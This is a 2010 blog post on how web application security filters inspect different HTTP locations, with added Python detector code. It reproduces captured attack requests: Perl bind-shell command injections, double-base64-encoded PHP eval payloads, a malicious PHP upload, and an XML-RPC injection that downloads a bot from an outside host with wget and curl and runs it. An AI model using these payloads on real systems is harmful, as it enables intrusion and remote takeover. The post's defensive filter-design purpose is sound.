Wednesday, April 21, 2010

Securing your web application – a deep understanding of HTTP protocol

A web application security filter must have a deep understanding of the HTTP protocol. This requirement has two objectives:
  1. Enable the security filter to detect attack payloads in a variety of HTTP locations (mainly in the request), such as:
    • The URL
    • The query string
    • Headers
    • The request content
      • XML
      • Multipart/form-data
      • POST parameters (application/x-www-form-urlencoded)
      • JSON
  2. Provide the ability to search for specific patterns in specific locations, raising pattern detection accuracy and, as a result, reducing false positives.

Taking this requirement to real-life examples, I will show how hackers send attack payloads in different HTTP locations, trying to find application vulnerabilities in as many ways as possible.

POST parameter in content – system command injection
POST /parse_xml.cgi HTTP/1.1
Host: www.application.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 261

filename=;perl -mio -e '$p=fork();exit,if$p;$c=new io::socket::inet(localport,28605,reuse,1,listen)->accept;$~->fdopen($c,w);stdin->fdopen($c,r);system$_ while<>'

Request header – system command injection
The attack in the example below sends a base64-encoded payload (encoded twice, as the decodings below show).

GET /test.php?evalme=eval($_server[http_x_ranxokdzbdyodszaj]); HTTP/1.1
Host: www.application.com
X-RANXOKDZBDYODSZAJ: eval(base64_decode(c3lzdGVtKGJhc2U2NF9kZWNvZGUoJ2NHVnliQ0F0VFVsUElDMWxJQ2NrY0QxbWIzSnJLQ2s3WlhocGRDeHBaaVJ3T3lSalBXNWxkeUJKVHpvNlUyOWphMlYwT2pwSlRrVlVLRXh2WTJGc1VHOXlkQ3d5TXpjeE1DeFNaWFZ6WlN3eExFeHBjM1JsYmlrdFBtRmpZMlZ3ZERza2ZpMCtabVJ2Y0dWdUtDUmpMSGNwTzFOVVJFbE9MVDVtWkc5d1pXNG9KR01zY2lrN2MzbHpkR1Z0SkY4Z2QyaHBiR1U4UGljPScpKTs));
Connection:close

The first decoding will result in:

system(base64_decode('cGVybCAtTUlPIC1lICckcD1mb3JrKCk7ZXhpdCxpZiRwOyRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKExvY2FsUG9ydCwyMzcxMCxSZXVzZSwxLExpc3RlbiktPmFjY2VwdDskfi0+ZmRvcGVuKCRjLHcpO1NURElOLT5mZG9wZW4oJGMscik7c3lzdGVtJF8gd2hpbGU8Pic=')KTs

The second decoding:

perl -MIO -e '$p=fork();exit,if$p;$c=new IO::Socket::INET(LocalPort,23710,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);system$_ while

The hacker uses double encoding to evade the security filter's decoding and pattern matching.
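Layered encoding of this kind is handled on the filter side by normalising before matching: peel base64 layers to a bounded depth and run the signatures over every layer, so a pattern buried two encodings deep is still seen. The Python below is an added example, not code from the original post; the signature list, the 16-character minimum run length, the printable-text heuristic and the bounded depth are my assumptions, and the sample built by build_double_encoded_sample() is constructed with the same nesting as the captured header rather than being the captured payload.

```python
import base64
import binascii
import re
import string

# A run of base64 alphabet characters long enough to be worth trying to decode.
BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
# Strings that, once a layer is peeled, indicate a command-execution payload.
# Illustrative signatures modelled on this post's captures, not a complete rule set.
SIGNATURES = ("system(", "base64_decode(", "perl -", "fork(", "IO::Socket")
PRINTABLE = set(string.printable)


def try_decode(chunk):
    """Decode one base64 run, tolerating stripped padding; None if it is not text."""
    chunk = chunk.rstrip("=")
    if len(chunk) % 4 == 1:
        return None  # impossible base64 length
    try:
        raw = base64.b64decode(chunk + "=" * (-len(chunk) % 4), validate=True)
    except (binascii.Error, ValueError):
        return None
    text = raw.decode("latin-1")
    # Random bytes also "decode"; only keep results that look like text.
    if not text or sum(c in PRINTABLE for c in text) / len(text) < 0.95:
        return None
    return text


def unwrap_layers(value, max_depth=4):
    """Return [(depth, text), ...]: the value itself plus every base64 layer found in it.

    The depth bound keeps a hostile request from making the filter decode forever.
    """
    layers, frontier = [(0, value)], [value]
    for depth in range(1, max_depth + 1):
        decoded = []
        for text in frontier:
            for match in BASE64_RUN.finditer(text):
                result = try_decode(match.group(0))
                if result is not None:
                    decoded.append(result)
        if not decoded:
            break
        layers.extend((depth, text) for text in decoded)
        frontier = decoded
    return layers


def find_hidden_signatures(value, max_depth=4):
    """Map each signature to the shallowest decoding depth at which it appears."""
    hits = {}
    for depth, text in unwrap_layers(value, max_depth):
        for sig in SIGNATURES:
            if sig in text:
                hits[sig] = min(depth, hits.get(sig, depth))
    return hits


def build_double_encoded_sample():
    """Constructed sample with the same nesting as the captured header (not the capture)."""
    inner = base64.b64encode(b"perl -MIO -e 'fork();IO::Socket'").decode("ascii")
    outer = base64.b64encode(f"system(base64_decode('{inner}'));".encode("ascii")).decode("ascii")
    return f"eval(base64_decode({outer}));"
```

On the constructed sample, find_hidden_signatures() reports base64_decode( at depth 0, system( at depth 1 and the perl/fork/IO::Socket strings at depth 2; a header value that only contains plain text yields an empty result. The same unwrapping applies to any location value, so it slots in front of whatever per-location matching the filter does.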

Parameter JSON – system command injection
POST /pajax/pajax/pajax_call_dispatcher.php HTTP/1.1
Host: www.application.com
Content-Type: text/x-json
Content-Length: 357

{ "id": "bb2238f1186dad8d6370d2bab5f290f71", "className": "Calculator", "method": "add(1,1);syste(base64_decode'cGVybCAtTUlPIC1lICckcD1mb3JrKCk7ZXhpdCxpZiRwOyRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKExvY2FsUG9ydCwxNDA3NCxSZXVzZSwxLExpc3RlbiktPmFjY2VwdDskfi0+ZmRvcGVuKCRjLHcpO1NURElOLT5mZG9wZW4oJGMscik7c3lzdGVtJF8gd2hpbGU8Pic='));;$obj->add", "params": ["1", "5"] }

Parameter multipart form data – malicious file upload
POST /tikiwiki/jhot.php HTTP/1.1
Host: www.application.com
Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 830

-----------------------------7d529a1d23092a
Content-Disposition: form-data; name="filepath"; filename="tiki-config.php";


<?php // $header: /cvsroot/tikiwiki/tiki/tiki-config.php,v 1.8.2.5 2005/08/22 08:00:53 telenieko exp $ // copyright (c) 2002-2005, luis argerich, garland foster, eduardo polidor, et. al. // all rights reserved. see copyright.txt for details and a complete list of authors. // licensed under the gnu lesser general public license. see license.txt for details. # $header: /cvsroot/tikiwiki/tiki/banner_image.php,v 1.8.2.5 2005/08/22 08:00:53 telenieko exp $ // tikiwiki configuration script eval(base64_decode"zxjyb3jfcmvwb3j0aw5nkdapo3nldf90aw1lx2xpbwl0kdapo2vjag8gim15x2rlbgltijtwyxnzdghydsgkx1nfulzfulsisfruuf9dtelftlrfsvaixsk7")); ?>

-----------------------------7d529a1d23092a--


Parameter XML – command injection
POST /htph/faq/xmlrpc.php HTTP/1.1
Host: www.application.com
Content-Type: text/xml
Content-Length: 503

test.method

',''));echo 'startcode
';echo passthru('cd /tmp;wget http://efnetbs.webs.com/bot.txt;fetch http://efnetbs.webs.com/bot.txt;curl -o bot.txt http://efnetbs.webs.com/bot.txt;lynx http://efnetbs.webs.com/bot.txt > bot.txt;GET http://efnetbs.webs.com/bot.txt > bot.txt;lwp-download http://efnetbs.webs.com/bot.txt;perl bot.txt;rm -rf *txt*');
echo 'endcode';exit;/*

Note – searching for patterns across the whole request content, rather than in specific locations, can result in numerous false positives.
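The location-aware inspection this post argues for, as an added Python example that is not code from the original post or from any product it describes: it decomposes a raw request into the locations listed at the top (query string, headers, form parameters, JSON values, multipart parts and XML text), applies each rule only in the location where the pattern is anomalous, and can also apply every rule everywhere to show the difference. The rule set, the location names and all sample requests (hosts under example.test, modelled on the shapes of the captures above) are constructed assumptions. A second Content-Type header, as seen in the multipart capture, is flagged as a finding rather than silently preferred.

```python
import json
import re
from urllib.parse import parse_qsl, urlsplit
from xml.etree import ElementTree

# Rules are scoped to the location where the pattern is anomalous. The signatures
# are illustrative, modelled on the captures in this post, not a complete rule set.
RULES = {
    "query": [("php-eval-of-server-var", re.compile(r"eval\s*\(\s*\$_server\b", re.I))],
    "header": [("php-code-in-header", re.compile(r"\b(eval|base64_decode)\s*\(", re.I))],
    "form": [("shell-chain-to-interpreter", re.compile(r"[;|&`]\s*(perl|sh|bash|python|wget|curl)\b", re.I))],
    "json": [("php-exec-in-json-value", re.compile(r"\b(system|passthru|shell_exec|base64_decode)\s*\(", re.I))],
    "upload-filename": [("executable-upload-name", re.compile(r"\.(php\d?|phtml|pl|cgi)$", re.I))],
    "upload-content": [("php-tag-in-upload", re.compile(r"<\?php\b", re.I))],
    "xml": [("shell-exec-in-xml-text", re.compile(r"\b(passthru|system|shell_exec)\s*\(", re.I))],
}
ALL_RULES = [rule for rules in RULES.values() for rule in rules]


def flatten_json(node, prefix=""):
    """Turn nested JSON into (dotted.path, string value) pairs."""
    if isinstance(node, dict):
        return [kv for k, v in node.items() for kv in flatten_json(v, f"{prefix}.{k}" if prefix else k)]
    if isinstance(node, list):
        return [kv for i, v in enumerate(node) for kv in flatten_json(v, f"{prefix}[{i}]")]
    return [(prefix, str(node))]


def parse_multipart(ctype, body):
    """Split a multipart/form-data body into (field name, filename, content) triples."""
    boundary = re.search(r'boundary="?([^";]+)"?', ctype).group(1).encode("latin-1")
    parts = []
    for chunk in body.split(b"--" + boundary)[1:]:
        if chunk.startswith(b"--"):
            break  # closing delimiter
        head, _, content = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        disposition = head.decode("latin-1")
        name = re.search(r'\bname="([^"]*)"', disposition)
        filename = re.search(r'\bfilename="([^"]*)"', disposition)
        parts.append((name.group(1) if name else "", filename.group(1) if filename else "",
                      content.rstrip(b"\r\n").decode("latin-1")))
    return parts


def parse_request(raw):
    """Decompose a raw HTTP request into named locations holding (name, value) pairs."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    target = lines[0].split(" ", 2)[1]
    headers = [(n.strip().lower(), v.strip()) for n, _, v in (line.partition(":") for line in lines[1:])]
    url = urlsplit(target)
    locations = {"url": [("path", url.path)], "query": parse_qsl(url.query, keep_blank_values=True),
                 "header": headers}
    # The first Content-Type decides how the body is parsed; a second one (as in the
    # multipart capture above) is flagged by inspect() rather than silently preferred.
    ctype = next((v for n, v in headers if n == "content-type"), "")
    if ctype.startswith("application/x-www-form-urlencoded"):
        locations["form"] = parse_qsl(body.decode("latin-1"), keep_blank_values=True)
    elif "json" in ctype:
        locations["json"] = flatten_json(json.loads(body))
    elif ctype.startswith("multipart/form-data"):
        parts = parse_multipart(ctype, body)
        locations["upload-filename"] = [(n, f) for n, f, _ in parts]
        locations["upload-content"] = [(n, c) for n, _, c in parts]
    elif "xml" in ctype:
        root = ElementTree.fromstring(body)
        locations["xml"] = [(el.tag, el.text.strip()) for el in root.iter() if el.text and el.text.strip()]
    return locations


def inspect(raw, scoped=True):
    """Return (location, name, rule) findings; scoped=False applies every rule to every location."""
    locations = parse_request(raw)
    findings = []
    if sum(1 for n, _ in locations["header"] if n == "content-type") > 1:
        findings.append(("header", "content-type", "duplicate-content-type"))
    for location, entries in locations.items():
        for name, value in entries:
            for rule, pattern in (RULES.get(location, []) if scoped else ALL_RULES):
                if pattern.search(value):
                    findings.append((location, name, rule))
    return findings


# Constructed sample requests mirroring the shapes of the captures above.
FORM_ATTACK = (b"POST /parse.cgi HTTP/1.1\r\nHost: example.test\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n"
               b"filename=report.txt%3Bperl+-e+%27print+1%27")
HEADER_ATTACK = (b"GET /test.php?evalme=eval(%24_SERVER%5BHTTP_X_PAYLOAD%5D)%3B HTTP/1.1\r\nHost: example.test\r\n"
                 b"X-Payload: eval(base64_decode(QUJD))\r\nConnection: close\r\n\r\n")
JSON_ATTACK = (b"POST /dispatch.php HTTP/1.1\r\nHost: example.test\r\nContent-Type: text/x-json\r\n\r\n"
               b'{"className": "Calculator", "method": "add(1,1);system(base64_decode(\'QUJD\'));", "params": ["1"]}')
UPLOAD_ATTACK = (b"POST /upload.php HTTP/1.1\r\nHost: example.test\r\nContent-Type: multipart/form-data; boundary=xYz\r\n\r\n"
                 b"--xYz\r\nContent-Disposition: form-data; name=\"filepath\"; filename=\"config.php\"\r\n\r\n"
                 b"<?php eval(base64_decode(\"QUJD\")); ?>\r\n--xYz--\r\n")
XML_ATTACK = (b"POST /xmlrpc.php HTTP/1.1\r\nHost: example.test\r\nContent-Type: text/xml\r\n\r\n"
              b"<methodCall><methodName>test.method</methodName><params><param><value><string>"
              b"',''));echo passthru('uname');/*</string></value></param></params></methodCall>")
# A legitimate forum post whose free text merely talks about PHP malware.
BENIGN_COMMENT = (b"POST /comment HTTP/1.1\r\nHost: example.test\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n"
                  b"text=Why+does+eval%28base64_decode%28x%29%29+appear+in+PHP+malware%3F")
```

inspect(BENIGN_COMMENT) returns nothing, while inspect(BENIGN_COMMENT, scoped=False) reports the header and JSON rules against a forum post that only talks about PHP malware, which is the false-positive class the note above describes; the five attack samples each produce findings in their own location only. The parser ignores Content-Length and chunked transfer encoding, which a real filter must honour, so treat it as the shape of the design rather than production code.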
